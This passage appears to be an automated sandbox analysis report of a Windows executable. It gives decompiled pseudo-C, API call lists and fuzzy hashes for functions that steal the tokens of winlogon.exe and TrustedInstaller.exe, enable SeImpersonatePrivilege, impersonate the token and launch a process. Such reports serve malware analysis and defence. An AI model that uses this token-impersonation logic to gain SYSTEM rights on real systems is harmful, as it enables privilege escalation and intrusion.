                                                                                                                                                                                                                          										_t153 = _t152 + 0x800;
                                                                                                                                                                                                                          										E0040289F(_t153);
                                                                                                                                                                                                                          										_t154 =  *(_t153 + 0xc);
                                                                                                                                                                                                                          										__eflags = _t154;
                                                                                                                                                                                                                          										if(_t154 == 0) {
                                                                                                                                                                                                                          											_t87 = 0;
                                                                                                                                                                                                                          											__eflags = 0;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										__eflags = _t87;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                          										_t84 = GetLastError();
                                                                                                                                                                                                                          										L43:
                                                                                                                                                                                                                          										_v12 = _t84;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                                          								__eflags = _t92;
                                                                                                                                                                                                                          								if(_t92 != 0) {
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t84 = _a28;
                                                                                                                                                                                                                          								goto L43;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                                                                                                                          							__eflags = _t93;
                                                                                                                                                                                                                          							if(_t93 != 0) {
                                                                                                                                                                                                                          								E00401306(_t93); // executed
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                          							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                                                                                                                          							__eflags = _t94;
                                                                                                                                                                                                                          							_v12 = _t94;
                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                          								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                                                                                                                          								__eflags = _t96;
                                                                                                                                                                                                                          								_v12 = _t96;
                                                                                                                                                                                                                          								if(_t96 == 0) {
                                                                                                                                                                                                                          									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          									__eflags = _t99;
                                                                                                                                                                                                                          									if(_t99 == 0) {
                                                                                                                                                                                                                          										_v12 = GetLastError();
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									CloseHandle(_v8); // executed
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								RevertToSelf(); // executed
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                                                                                                                          						__eflags = _t104;
                                                                                                                                                                                                                          						if(_t104 == 0) {
                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                          						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t149 = __eax + 0x44ac;
                                                                                                                                                                                                                          					_t110 = wcslen(_t149);
                                                                                                                                                                                                                          					__eflags = _t110;
                                                                                                                                                                                                                          					if(_t110 <= 0) {
                                                                                                                                                                                                                          						goto L44;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                          						__eflags = E00404EA9(_t149, _t110);
                                                                                                                                                                                                                          						_t112 =  &_v8;
                                                                                                                                                                                                                          						_push(_t112);
                                                                                                                                                                                                                          						_push(_t149);
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							_push(_t152);
                                                                                                                                                                                                                          							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_push(_t112);
                                                                                                                                                                                                                          							_push(_t152);
                                                                                                                                                                                                                          							_t113 = E00401E44();
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v12 = _t113;
                                                                                                                                                                                                                          						__eflags = _t113;
                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v548 = 0;
                                                                                                                                                                                                                          					memset( &_v546, 0, 0x208);
                                                                                                                                                                                                                          					_v1076 = 0;
                                                                                                                                                                                                                          					memset( &_v1074, 0, 0x208);
                                                                                                                                                                                                                          					E00404C3C( &_v548);
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                                                                                                                          					_t151 = wcslen(??);
                                                                                                                                                                                                                          					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                                                                                                                          					_t159 = _t151 + _t10 - 0x104;
                                                                                                                                                                                                                          					if(_t151 + _t10 >= 0x104) {
                                                                                                                                                                                                                          						_v1076 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                          					_t160 = _t105;
                                                                                                                                                                                                                          					_v12 = _t105;
                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                          					if(_t160 == 0) {
                                                                                                                                                                                                                          						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                                                                                                                          							_v12 = GetLastError();
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						CloseHandle(_v8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					L44:
                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402220
                                                                                                                                                                                                                          0x00402225
                                                                                                                                                                                                                          0x00402227
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                          0x00402179
                                                                                                                                                                                                                          0x0040217b
                                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                                          0x00402183
                                                                                                                                                                                                                          0x00402185
                                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                                          0x0040218d
                                                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                                                          0x004021a7
                                                                                                                                                                                                                          0x004021a9
                                                                                                                                                                                                                          0x004021ac
                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                          0x004021d3
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004020fe
                                                                                                                                                                                                                          0x00402103
                                                                                                                                                                                                                          0x00402105
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402111
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x004020ad
                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                          0x004020b9
                                                                                                                                                                                                                          0x004020bc
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020c2
                                                                                                                                                                                                                          0x004020c4
                                                                                                                                                                                                                          0x004020ce
                                                                                                                                                                                                                          0x004020d0
                                                                                                                                                                                                                          0x004020d3
                                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                                          0x004020d5
                                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                                          0x004020e7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020dd
                                                                                                                                                                                                                          0x004020de
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020ec
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                          0x00402016
                                                                                                                                                                                                                          0x0040201d
                                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                          0x00402044
                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                          0x00402064
                                                                                                                                                                                                                          0x00402068
                                                                                                                                                                                                                          0x0040206e
                                                                                                                                                                                                                          0x0040208b
                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                          0x00402082
                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                          0x0040209e
                                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x0040211b
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x00402149
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x004022cb
                                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                                          0x004022d2

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040201D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402035
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00402050
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040205F
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004020B4
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004020D7
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                                                                                                                          • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                                                                                                                          • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                            • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                            • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                            • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                                                                          • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3201562063-2355939583
                                                                                                                                                                                                                          • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t7;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t12;
                                                                                                                                                                                                                          				CHAR* _t13;
                                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *__esi == 0) {
                                                                                                                                                                                                                          					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                                                                                                                                          					 *_t17 = "GetModuleBaseNameW";
                                                                                                                                                                                                                          					 *__esi = _t7;
                                                                                                                                                                                                                          					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                                                                                                                          					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                                                                                                                          					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                                                                                                                          					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                                                                                                                          					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                                                                                                                          					__esi[3] = _t12;
                                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t6;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1529661771-70141382
                                                                                                                                                                                                                          • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                                          • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                                                                          • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				void _v538;
                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                          				void _v1066;
                                                                                                                                                                                                                          				char _v1068;
                                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          				long _t49;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                                          				_v540 = 0;
                                                                                                                                                                                                                          				memset( &_v538, 0, 0x208);
                                                                                                                                                                                                                          				_v1068 = 0;
                                                                                                                                                                                                                          				memset( &_v1066, 0, 0x208);
                                                                                                                                                                                                                          				E00404C3C( &_v540);
                                                                                                                                                                                                                          				_t48 = L"winlogon.exe";
                                                                                                                                                                                                                          				_t39 = wcslen(L"winlogon.exe");
                                                                                                                                                                                                                          				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                                                                                                                          				_t53 = _t39 + _t8 - 0x104;
                                                                                                                                                                                                                          				_pop(_t42);
                                                                                                                                                                                                                          				if(_t39 + _t8 >= 0x104) {
                                                                                                                                                                                                                          					_v1068 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                                                                                                                          					_pop(_t42);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                                                                                                                          				_t49 = _t30;
                                                                                                                                                                                                                          				_t54 = _t49;
                                                                                                                                                                                                                          				if(_t49 == 0) {
                                                                                                                                                                                                                          					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                                                                                                                          					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                                                                                                                          					if(_t33 == 0) {
                                                                                                                                                                                                                          						_t49 = GetLastError();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseHandle(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t49;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                                                                          • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                                                                          • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3867304300-2177360481
                                                                                                                                                                                                                          • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x41c8e8 == 0) {
                                                                                                                                                                                                                          					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          					if(_t9 != 0) {
                                                                                                                                                                                                                          						 *0x41c8e8 = 1;
                                                                                                                                                                                                                          						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *0x41c8ec == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                          • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                          			E00402F31(void* _a4) {
                                                                                                                                                                                                                          				void _v530;
                                                                                                                                                                                                                          				long _v532;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				wchar_t* _t15;
                                                                                                                                                                                                                          				intOrPtr _t18;
                                                                                                                                                                                                                          				short* _t19;
                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v532 = _v532 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v530, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v532);
                                                                                                                                                                                                                          				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                                                                                                                          				if(_t15 != 0) {
                                                                                                                                                                                                                          					 *_t15 =  *_t15 & 0x00000000;
